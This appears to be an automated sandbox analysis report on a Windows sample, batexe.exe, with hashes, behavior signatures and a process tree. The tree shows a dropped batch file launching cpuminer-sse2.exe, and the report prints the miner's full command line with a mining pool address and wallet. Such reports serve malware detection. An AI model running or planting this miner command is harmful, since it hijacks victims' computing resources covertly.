Analysis
-
max time kernel
295s -
max time network
298s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
11/02/2024, 22:53
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231222-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3480 b2e.exe 1144 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1144 cpuminer-sse2.exe 1144 cpuminer-sse2.exe 1144 cpuminer-sse2.exe 1144 cpuminer-sse2.exe 1144 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/5004-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5004 wrote to memory of 3480 5004 batexe.exe 74 PID 5004 wrote to memory of 3480 5004 batexe.exe 74 PID 5004 wrote to memory of 3480 5004 batexe.exe 74 PID 3480 wrote to memory of 3568 3480 b2e.exe 75 PID 3480 wrote to memory of 3568 3480 b2e.exe 75 PID 3480 wrote to memory of 3568 3480 b2e.exe 75 PID 3568 wrote to memory of 1144 3568 cmd.exe 78 PID 3568 wrote to memory of 1144 3568 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D949.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1144
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD56f194119986e66084a37fab2118104f0
SHA129d570973321b91b8b0aa7c9c787348db750caf4
SHA256912371d8c061c9764690803f3d776e09c693f88d66bedccb568bc78488d1f2ba
SHA512e1152862cef40fbb2f7eca2adc58648658dd5953fa7b803550d68ba22991deab8f55df3967509e39a140834937806a5ed7881c09fdea3c7c27a0c4535a63fe07
-
Filesize
3.4MB
MD5469424e937356dea074c63081720fe60
SHA1d14394b46fcd54d4411d476a533a3e93c8dea268
SHA2569215bfb29240d1e784c2418fe7b634ea1c930c61530c57e74977d326e33d6eed
SHA512602eae5f59014da9074de6184fdb5e6fd6b6b89af487698b3255672681a2f2847d4c94b0bc4d6198fee64dfb59715886d0297b41e74d5746b0a70652b26617f2
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
221KB
MD5e42bb3d38ed6b3d1b058511eeb6fc3a5
SHA1bd2ac7f9213751b1c78a093b9e6be84a21dffa15
SHA256839a34c0f06d17002a3a3ed1b2cc2177f7d7786e034876df0fb5fc3b6bf07281
SHA512d176f37dd8fa8ae1621aba5a54ba973d9a33f8586ee12f771f3d5905b0ea9297ad4787ddfaf608c3f36ba963d055958dd2cc8b2475e576a260ea7aa7b217f21a
-
Filesize
256KB
MD5f8edb8dd2fb15f1887ace09587589dd4
SHA1cbf7cbfefc0215d9500a98d9064deb9e86787152
SHA2560465270288d69a0ec9beb7114707bed76756c14148293237d0d35423abdfc67b
SHA512aa993112953225280c0bedb1ebd8288298b9c22a6a884a952ba60e48cbd21c4ce60724b7adc961a0528d7c569596e3420fec2670fc47c3eb6c00c691e0378abc
-
Filesize
256KB
MD51d86b9560854472453237bcbaa2e253f
SHA15a03a7902d250377a3e9f746badcb696e2c98228
SHA2561493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d
SHA512afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699
-
Filesize
213KB
MD5146f4a7e15cc081a5329cc4b85f66d5f
SHA1758aed6fcc7258ca8bd888154078ac136dad74b8
SHA2564af2f105c81385eeab0eebbf0e252de530c3f9edb27821ba5dbfcffc9e1cf290
SHA512a6b5a1fd6f791c15ed4c897b24156b54d61912b3397665efe51c9623da1b2c2f9f7a6cc575c2c7c89349eeeeeec4e7de835d88cb9fcfe05e5d032c4e71591bfc
-
Filesize
320KB
MD51ae43cc09627ff82d15527ea2693fd76
SHA1c39ffa1a4b80c29fa1f5caed3e7d091253266c66
SHA256b63980c9d592a6d0d8521f74bd4c6f7cc4ae5f8c3320d2bd63764c56648ac45f
SHA51221945e4e2fad3ee2b2a19d19bbbc1ada832c33a0d3bf499d6ac8f093b39021323ea0f7df3d54167a3456cbaf01ff126a6e6abbe17dd4eb8d5a24ca000888c271